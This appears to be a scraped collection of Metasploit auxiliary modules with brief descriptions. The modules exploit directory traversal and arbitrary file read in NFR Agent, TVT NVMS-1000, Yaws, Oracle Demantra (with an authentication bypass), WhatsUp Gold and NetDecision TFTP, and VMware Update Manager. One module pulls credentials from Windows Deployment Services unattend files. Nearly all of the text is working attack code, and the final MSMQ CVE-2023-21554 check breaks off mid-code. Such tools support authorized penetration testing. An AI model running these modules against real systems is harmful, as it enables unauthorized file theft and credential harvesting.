NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'         => 'NFR Agent SRS Record Arbitrary Remote File Access',      'Description'  =>  %q{        NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and        CMD 103, specifying a full pathname. This module has been tested successfully        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File        Reporter 1.0.1).      },      'References'   =>        [          [ 'CVE', '2012-4957' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/' ]        ],      'Author'       =>        [          'juan vazquez'        ],      'License'      => MSF_LICENSE,      'DisclosureDate' => "Nov 16 2012"    )    register_options(    [      Opt::RPORT(3037),      OptBool.new('SSL', [true, 'Use SSL', true]),      OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])    ])    register_autofilter_ports([ 3037 ])  end  def run_host(ip)    record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>"    md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase    message = md5 + record    print_status("Retrieving the file contents")    res = send_request_cgi(      {        'uri'     => '/FSF/CMD',        'version' => '1.1',        'method'  => 'POST',        'ctype'   => "text/xml",        'data'    => message      })    if res and res.code == 200 and not res.body =~ /<RESULT>/      loot = res.body      f = ::File.basename(datastore['RFILE'])      path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])      print_good("#{datastore['RFILE']} saved in #{path}")    else      print_error("Failed to retrieve the file contents")    end  endend

NFR Agent SRS Record Arbitrary Remote File Access

This Metasploit module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'        => 'TVT NVMS-1000 Directory Traversal',      'Description' => %q{        This module exploits an unauthenticated directory traversal vulnerability which        exists in TVT network surveillance management software-1000 version 3.4.1.        NVMS listens by default on port 80.      },      'References'  =>        [          ['CVE', '2019-20085'],          ['EDB', '47774']        ],      'Author'      =>        [          'Numan Türle', # Vulnerability discovery          'Dhiraj Mishra' # Metasploit module        ],      'DisclosureDate' => '2019-12-12',      'License'        => MSF_LICENSE    ))    register_options(      [        Opt::RPORT(80),        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),        OptString.new('TARGETURI', [true, "The base URI path of nvms", '/']),        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])      ])  end  def run_host(ip)    filename = datastore['FILEPATH']    traversal = normalize_uri(target_uri.path, '/../' * datastore['DEPTH'], filename)    res = send_request_raw({      'method' => 'GET',      'uri'    => traversal    })    unless res && res.code == 200      print_error('Nothing was downloaded')      return    end    print_good("#{peer} - Downloaded #{res.body.length} bytes")    path = store_loot(      'nvms.traversal',      'text/plain',      ip,      res.body,      filename    )    print_good("File saved in: #{path}")  endend

TVT NVMS-1000 Directory Traversal

This Metasploit module exploits a directory traversal bug in Yaws v1.9.1 or less. The module can only be used to retrieve files. However, code execution might be possible. Because when the malicious user sends a PUT request, a file is actually created, except no content is written.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info={})    super(update_info(info,      'Name'           => "Yaws Web Server Directory Traversal",      'Description'    => %q{          This module exploits a directory traversal bug in Yaws v1.9.1 or less.        The module can only be used to retrieve files. However, code execution might        be possible. Because when the malicious user sends a PUT request, a file is        actually created, except no content is written.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'sinn3r', # Metasploit module        ],      'References'     =>        [          ['CVE', '2011-4350'],          ['OSVDB', '77581'],          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=757181']        ],      'DisclosureDate' => '2011-11-25'    ))    register_options(      [        Opt::RPORT(8080),        OptString.new('FILEPATH', [false, 'The name of the file to download', 'windows\\win.ini'])      ])  end  def run_host(ip)    # No point to continue if no filename is specified    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?      print_error("Please supply the name of the file you want to download")      return    end    # Create request    traversal = "..\\..\\..\\..\\"    res = send_request_raw({      'method' => 'GET',      'uri'    => "/#{traversal}/#{datastore['FILEPATH']}"    }, 25)    # Show data if needed    if res and res.code == 200      vprint_line(res.to_s)      fname = File.basename(datastore['FILEPATH'])      path = store_loot(        'yaws.http',        'application/octet-stream',        ip,        res.body,        fname      )      print_status("File saved in: #{path}")    else      print_error("Nothing was downloaded")    end  endend

Yaws Web Server Directory Traversal

This Metasploit module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',      'Description'    => %q{        This module exploits a file download vulnerability found in Oracle        Demantra 12.2.1 in combination with an authentication bypass. By        combining these exposures, an unauthenticated user can retrieve any file        on the system by referencing the full file path to any file a vulnerable        machine.      },      'References'     =>        [          [ 'CVE', '2013-5877'],          [ 'CVE', '2013-5880'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']        ],      'Author'         =>        [          'Oliver Gruskovnjak'        ],      'License'        => MSF_LICENSE,      'DisclosureDate' => '2014-02-28'    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('SSL',   [false, 'Use SSL', false]),        OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])      ])  end  def run_host(ip)    filename = datastore['FILEPATH']    authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"    res = send_request_cgi({      'uri' => normalize_uri(authbypass),      'method' => 'POST',      'encode_params' => false,      'vars_post' => {        'filename' => "#{filename}%00"      }    })    if res.nil? or res.body.empty?      fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    end    if res.code == 200      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")      fname = File.basename(datastore['FILEPATH'])      path = store_loot(        'oracle.demantra',        'application/octet-stream',        ip,        res.body,        fname)      print_good("#{ip}:#{rport} - File saved in: #{path}")    end  endend

Oracle Demantra Arbitrary File Retrieval With Authentication Bypass

This Metasploit module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::DCERPC  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  DCERPCPacket     = Rex::Proto::DCERPC::Packet  DCERPCClient     = Rex::Proto::DCERPC::Client  DCERPCResponse   = Rex::Proto::DCERPC::Response  DCERPCUUID       = Rex::Proto::DCERPC::UUID  WDS_CONST       = Rex::Proto::DCERPC::WDSCP::Constants  def initialize(info = {})    super(update_info(info,      'Name'           => 'Microsoft Windows Deployment Services Unattend Retrieval',      'Description'    => %q{        This module retrieves the client unattend file from Windows        Deployment Services RPC service and parses out the stored credentials.        Tested against Windows 2008 R2 x64 and Windows 2003 x86.      },      'Author'         => [ 'Ben Campbell' ],      'License'        => MSF_LICENSE,      'References'     =>        [          [ 'URL', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'],          [ 'URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html']        ],      ))    register_options(      [        Opt::RPORT(5040),      ])    deregister_options('CHOST', 'CPORT', 'SSL', 'SSLVersion')    register_advanced_options(      [        OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false])      ])  end  def run_host(ip)    begin      query_host(ip)    rescue ::Interrupt      raise $!    rescue ::Rex::ConnectionError => e      print_error("#{ip}:#{rport} Connection Error: #{e}")    ensure      # Ensure socket is pulled down afterwards      self.dcerpc.socket.close rescue nil      self.dcerpc = nil      self.handle = nil    end  end  def query_host(rhost)    # Create a handler with our UUID and Transfer Syntax    self.handle = Rex::Proto::DCERPC::Handle.new(      [        WDS_CONST::WDSCP_RPC_UUID,        '1.0',      ],      'ncacn_ip_tcp',      rhost,      [datastore['RPORT']]    )    print_status("Binding to #{handle} ...")    self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock)    vprint_good("Bound to #{handle}")    report_service(      :host => rhost,      :port => datastore['RPORT'],      :proto => 'tcp',      :name => "dcerpc",      :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services"    )    table = Rex::Text::Table.new({      'Header' => 'Windows Deployment Services',      'Indent' => 1,      'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password']    })    creds_found = false    WDS_CONST::ARCHITECTURE.each do |architecture|      if architecture[0] == :ARM && !datastore['ENUM_ARM']        vprint_status "Skipping #{architecture[0]} architecture due to adv option"        next      end      begin        result = request_client_unattend(architecture)      rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e        vprint_error(e.to_s)        print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.")        return nil      end      unless result.nil?        loot_unattend(architecture[0], result)        results = parse_client_unattend(result)        results.each do |result|          unless result.empty?            if result['username'] and result['password']              print_good("Retrieved #{result['type']} credentials for #{architecture[0]}")              creds_found = true              domain = ""              domain = result['domain'] if result['domain']              report_creds(domain, result['username'], result['password'])              table << [architecture[0], result['type'], domain, result['username'], result['password']]            end          end        end      end    end    if creds_found      print_line      table.print      print_line    else      print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.")    end  end  def request_client_unattend(architecture)    # Construct WDS Control Protocol Message    packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND)    guid = Rex::Text.rand_text_hex(32)    packet.add_var(  WDS_CONST::VAR_NAME_CLIENT_GUID, guid)    # Not sure what this padding is for...    mac = [0x30].pack('C') * 20    mac << Rex::Text.rand_text_hex(12)    packet.add_var(  WDS_CONST::VAR_NAME_CLIENT_MAC, mac)    arch = [architecture[1]].pack('C')    packet.add_var(  WDS_CONST::VAR_NAME_ARCHITECTURE, arch)    version = [1].pack('V')    packet.add_var(  WDS_CONST::VAR_NAME_VERSION, version)    wdsc_packet = packet.create    vprint_status("Sending #{architecture[0]} Client Unattend request ...")    dcerpc.call(0, wdsc_packet, false)    timeout = datastore['DCERPC::ReadTimeout']    response = Rex::Proto::DCERPC::Client.read_response(self.dcerpc.socket, timeout)    if (response and response.stub_data)      vprint_status('Received response ...')      data = response.stub_data      # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000      op_error_code = data.unpack('v*')[19]      if op_error_code == 0        if data.length < 277          vprint_error("No Unattend received for #{architecture[0]} architecture")          return nil        else          vprint_status("Received #{architecture[0]} unattend file ...")          return extract_unattend(data)        end      else        vprint_error("Error code received for #{architecture[0]}: #{op_error_code}")        return nil      end    end  end  def extract_unattend(data)    start = data.index('<?xml')    finish = data.index('</unattend>')    if start and finish      finish += 10      return data[start..finish]    else      print_error("Incomplete transmission or malformed unattend file.")      return nil    end  end  def parse_client_unattend(data)    begin      xml = REXML::Document.new(data)      return Rex::Parser::Unattend.parse(xml).flatten    rescue REXML::ParseException => e      print_error("Invalid XML format")      vprint_line(e.message)      return nil     end  end  def loot_unattend(archi, data)    return if data.empty?    p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services")    print_good("Raw version of #{archi} saved as: #{p}")  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def report_creds(domain, user, pass)    report_cred(      ip: rhost,      port: 4050,      service_name: 'dcerpc',      user: "#{domain}\\#{user}",      password: pass,      proof: domain    )  endend

Microsoft Windows Deployment Services Unattend Retrieval

This Metasploit modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Golds TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "IpSwitch WhatsUp Gold TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp        Gold's TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Prabhu S Angadi',  # Initial discovery and poc          'sinn3r',           # Metasploit module          'juan vazquez'      # More improvements        ],      'References'     =>        [          ['OSVDB', '77455'],          ['BID', '50890'],          ['EDB', '18189'],          ['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt'],          ['CVE', '2011-4722']        ],      'DisclosureDate' => '2011-12-12'    ))    register_options(      [        Opt::RPORT(69),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),        OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])      ])  end  def run_host(ip)    # Prepare the filename    file_name  = "../"*10    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'whatsupgold.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend=beginRemote code execution might be unlikely with this directory traversal bug, because WRITErequests are forbidden by default, and cannot be changed.=end

IpSwitch WhatsUp Gold TFTP Directory Traversal

This Metasploit modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "NetDecision 4.2 TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in NetDecision 4.2        TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Rob Kraus', # Vulnerability discovery          'juan vazquez' # Metasploit module        ],      'References'     =>        [          ['CVE', '2009-1730'],          ['OSVDB', '54607'],          ['BID', '35002']        ],      'DisclosureDate' => '2009-05-16'    ))    register_options(      [        Opt::RPORT(69),        OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),      ])  end  def run_host(ip)    # Configure how deep we want to traverse    depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']    # Prepare the filename    file_name = "../" * depth    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'netdecision.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend

NetDecision 4.2 TFTP Directory Traversal

This Metasploit modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info={})    super(update_info(info,      'Name'           => "VMWare Update Manager 4 Directory Traversal",      'Description'    => %q{        This modules exploits a directory traversal vulnerability in VMWare Update Manager        on port 9084.  Versions affected by this vulnerability: vCenter Update Manager        4.1 prior to Update 2, vCenter Update Manager 4 Update 4.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Alexey Sintsov',  #Initial discovery, poc          'sinn3r'           #Metasploit        ],      'References'     =>        [          ['CVE', '2011-4404'],          ['EDB', '18138'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2011-0014.html'],          ['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']        ],      'DisclosureDate' => '2011-11-21'))    register_options(      [        Opt::RPORT(9084),        OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),        OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])      ])  end  def run_host(ip)    fname     = File.basename(datastore['FILE'])    traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"    uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']    print_status("#{rhost}:#{rport} - Requesting: #{uri}")    res = send_request_raw({      'method' => 'GET',      'uri'    => uri    }, 25)    # If there's no response, don't bother    if res.nil? or res.body.empty?      print_error("No content retrieved from: #{ip}")      return    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    else      print_good("File retrieved from: #{ip}")      p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)      print_good("File stored in: #{p}")    end  endend

VMWare Update Manager 4 Directory Traversal

This Metasploit module checks the provided hosts for the CVE-2023-21554 vulnerability by sending a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that overflows the given buffer. On patched systems, the error is caught and no response is sent back. On vulnerable systems, the integer wraps around and depending on the length could cause an out-of-bounds write. In the context of this module a response is sent back, which indicates that the system is vulnerable.

##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##

require 'bindata'

class MetasploitModule < Msf::Auxiliary  
  include Msf::Exploit::Remote::Tcp  
  include Msf::Auxiliary::Scanner  
  include Msf::Auxiliary::Report

  def initialize(info = {})  
    super(  
      update_info(  
        info,  
        'Name' => 'CVE-2023-21554 - QueueJumper - MSMQ RCE Check',  
        'Description' => %q{  
          This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending  
          a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that  
          overflows the given buffer. On patched systems, the error is caught and no response  
          is sent back. On vulnerable systems, the integer wraps around and depending on the length  
          could cause an out-of-bounds write. In the context of this module a response is sent back,  
          which indicates that the system is vulnerable.  
        },  
        'Author' => [  
          'Wayne Low', # Vulnerability discovery  
          'Haifei Li', # Vulnerability discovery  
          'Bastian Kanbach <bastian.kanbach@securesystems.de>' # Metasploit Module, @__bka__  
        ],  
        'References' => [  
          [ 'CVE', '2023-21554' ],  
          [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554' ],  
          [ 'URL', 'https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/' ]  
        ],  
        'DisclosureDate' => '2023-04-11',  
        'License' => MSF_LICENSE,  
        'Notes' => {  
          'Stability' => [ CRASH_SAFE ],  
          'SideEffects' => [IOC_IN_LOGS],  
          'Reliability' => [REPEATABLE_SESSION],  
          'AKA' => ['QueueJumper']  
        }  
      )  
    )  
    register_options([  
      Opt::RPORT(1801)  
    ])  
  end

  # Preparing message struct according to https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/f9e71595-339a-4cc4-8341-371e0a4cb232

  class BaseHeader < BinData::Record  
    # BaseHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/058cdeb4-7a3c-405b-989c-d32b9d6bddae)  
    #  
    # Simple header containing a static signature, packet size, some flags and some sort of timeout value for the message to arrive  
    #

    endian :big

    uint8 :version_number  
    uint8 :reserved  
    uint16 :flags  
    uint32 :signature  
    uint32le :packet_size  
    uint32le :time_to_reach_queue  
  end

  class UserHeader < BinData::Record  
    # UserHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/056b43bc-2466-4342-8504-1630310d5965)  
    #  
    # The UserHeader is an essential header that defines the destination, message id,  
    # source, sent time and expiration time  
    #

    endian :big

    string :source_queue_manager, length: 16  
    string :queue_manager_address, length: 16  
    uint32le :time_to_be_received  
    uint32le :sent_time  
    uint32le :message_id  
    uint32 :flags  
    uint16le :destination_queue_length  
    string :destination_queue  
    string :padding  
  end

  class MessagePropertiesHeader < BinData::Record  
    # MessagePropertiesHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b219bdf4-1bf6-4688-94d8-25fdba45e5ec)  
    #  
    # This header contains meta information about the message like its label,  
    # message size and whether encryption is used.  
    #

    endian :big

    uint8  :flags  
    uint8  :label_length  
    uint16 :message_class  
    string :correlation_id, length: 20  
    uint32 :body_type  
    uint32 :application_tag  
    uint32 :message_size  
    uint32 :allocation_body_size  
    uint32 :privacy_level  
    uint32 :hash_algorithm  
    uint32 :encryption_algorithm  
    uint32 :extension_size  
    string :label  
  end

  class SRMPEnvelopeHeader < BinData::Record  
    # SRMPEnvelopeHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/062b8317-2ade-4b1c-804d-1674b2fdcad3)  
    #  
    # This header contains information about the SOAP envelope of the message.  
    # It includes information about destination queue, label, message and sent  
    # or expiration dates.  
    # The Data field contains a SRMP Message Structure (https://learn.microsoft.com/en-us/openspecs/windows_protocols/mc-mqsrm/38cfc717-c703-46aa-a145-34f60b79399b)  
    #

    endian :big

    uint16  :header_id  
    uint16  :reserved  
    uint32le :data_length  
    string :data  
    string :padding  
  end

  class CompoundMessageHeader < BinData::Record  
    # CompoundMessageHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/ecf70c09-d312-4afc-9e2c-f61a5c827f47)  
    #  
    # This header contains information about the SRMP compound message.  
    # This is basically a HTTP message containing HTTP headers and a SOAP  
    # body that defines parameters like the message destination, sent date,  
    # label and some more.  
    #

    endian :big

    uint16le :header_id  
    uint16 :reserved  
    uint32le :http_body_size  
    uint32le :msg_body_size  
    uint32le :msg_body_offset  
    string :data  
  end

  class ExtensionHeader < BinData::Record  
    #  ExtensionHeader (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqrr/baf230bf-7f15-4d03-bd1d-f8276608a955)  
    #  
    #  Header detailing if any further headers are present. In this case  
    #  no further headers were appended.  
    #

    endian :big

    uint32le :header_size  
    uint32le :remaining_headers_size  
    uint8 :flags  
    string :reserved, length: 3  
  end

  def send_message(msg)  
    connect  
    sock.put(msg)  
    response = sock.timed_read(1024)  
    disconnect  
    return response  
  end

  def run_host(ip)  
    base_header = BaseHeader.new

    # Version number is always 0x10  
    base_header.version_number = 16

    base_header.reserved = 0

    # Flags: PR=3 (Message Priority)  
    base_header.flags = 768

    # Signature is static and always set to 'LIOR'  
    base_header.signature = 0x4C494F52

    # TimeToReachQueue set to 'infinite' (0xFFFFFFFF)  
    base_header.time_to_reach_queue = 4294967295

    user_header = UserHeader.new

    # SourceQueueManager is set to a null UUID, since SRMP Messages use the SOAP Headers for this  
    user_header.source_queue_manager = "\x00" * 16

    # QueueManagerAddress is set to a null UUID, since SRMP Messages use the SOAP Headers for this  
    user_header.queue_manager_address = "\x00" * 16

    user_header.time_to_be_received = 0

    # SentTime is set to an arbitrary value. For this purpose it doesn't matter if it's in the past  
    user_header.sent_time = 1690217059

    user_header.message_id = 1

    # Flags: RC=1, DQ=7 (Direct Format Type), F=1 (MessagePropertiesHeader present), J=1 (HTTP used)  
    user_header.flags = 18620418

    # An arbitrary ip address and queue name was chosen to send the message.  
    # Usually this need to match an existing IP address and queue name, however  
    # for this Proof-of-Concept it doesn't matter what values are used.  
    user_header.destination_queue = "http://192.168.10.100/msmq/private$/queuejumper\x00".encode('utf-16le')

    user_header.destination_queue_length = user_header.destination_queue.length  
    user_header.padding = ''  
    user_header_padding_required = (4 - (user_header.to_binary_s.length % 4)) % 4  
    user_header.padding = "\x00" * user_header_padding_required

    message_properties_header = MessagePropertiesHeader.new  
    message_properties_header.flags = 0  
    message_properties_header.message_class = 0  
    message_properties_header.correlation_id = "\x00" * 20  
    message_properties_header.body_type = 0  
    message_properties_header.application_tag = 0

    # Usually this field contains the size of the message. In SRMP messages this is handles within the SOAP headers  
    message_properties_header.message_size = 0

    message_properties_header.allocation_body_size = 0  
    message_properties_header.privacy_level = 0  
    message_properties_header.hash_algorithm = 0  
    message_properties_header.encryption_algorithm = 0  
    message_properties_header.extension_size = 0

    # Label of the message was set to the arbitrary value 'poc'  
    message_properties_header.label = "poc\x00".encode('utf-16le')

    message_properties_header.label_length = message_properties_header.label.length / 2

    srmp_envelope_header = SRMPEnvelopeHeader.new  
    srmp_envelope_header.header_id = 0  
    srmp_envelope_header.reserved = 0

    # The payload within the SRMPEnvelopeHeader structure is a SOAP request that defines message label, destination queue  
    # and expiry and sent dates.  
    # Usually the destination information need to match the IP address and queue name, however  
    # for this Proof-of-Concept it doesn't matter what values are used.  
    srmp_envelope_header.data = <<~EOF.chomp  
      <se:Envelope xmlns:se="http://schemas.xmlsoap.org/soap/envelope/" \r  
      xmlns="http://schemas.xmlsoap.org/srmp/">\r  
      <se:Header>\r  
       <path xmlns="http://schemas.xmlsoap.org/rp/" se:mustUnderstand="1">\r  
         <action>MSMQ:poc</action>\r  
         <to>http://192.168.10.100/msmq/private$/queuejumper</to>\r  
         <id>uuid:1@00000000-0000-0000-0000-000000000000</id>\r  
       </path>\r  
       <properties se:mustUnderstand="1">\r  
         <expiresAt>20600609T164419</expiresAt>\r  
         <sentAt>20230724T164419</sentAt>\r  
       </properties>\r  
      </se:Header>\r  
      <se:Body></se:Body>\r  
      </se:Envelope>\r\n\r\n\x00  
    EOF

    srmp_envelope_header.data = srmp_envelope_header.data.encode('utf-16le')  
    srmp_envelope_header.data_length = srmp_envelope_header.data.length / 2  
    srmp_envelope_header_padding_required = (4 - (srmp_envelope_header.to_binary_s.length % 4)) % 4  
    srmp_envelope_header.padding = "\x00" * srmp_envelope_header_padding_required

    compound_message_header = CompoundMessageHeader.new

    # HeaderId is set to an arbitrary value  
    compound_message_header.header_id = 500

    compound_message_header.reserved = 0

    # MsgBodySize denotes the size of the actual message  
    compound_message_header.msg_body_size = 7

    # MsgBodyOffset is the offset of the actual message within the CompoundMessageHeader payload  
    compound_message_header.msg_body_offset = 995

    # The data field within the CompoundMessageHeader structure contains a HTTP-POST request that is used to submit the message  
    # to MSMQ. It contains the destination host, the SOAP envelope from SRMPEnvelopeHeader, sent and expiry dates. The destination  
    # addresses and queue names don't need to match for this proof-of-concept to work. With incorrect information the message will  
    # never reach the destination, however parsing of the structure and triggering the vulnerable code sequence happens before anyway.  
    compound_message_header.data = <<~EOF.chomp  
      POST /msmq HTTP/1.1\r  
      Content-Length: 816\r  
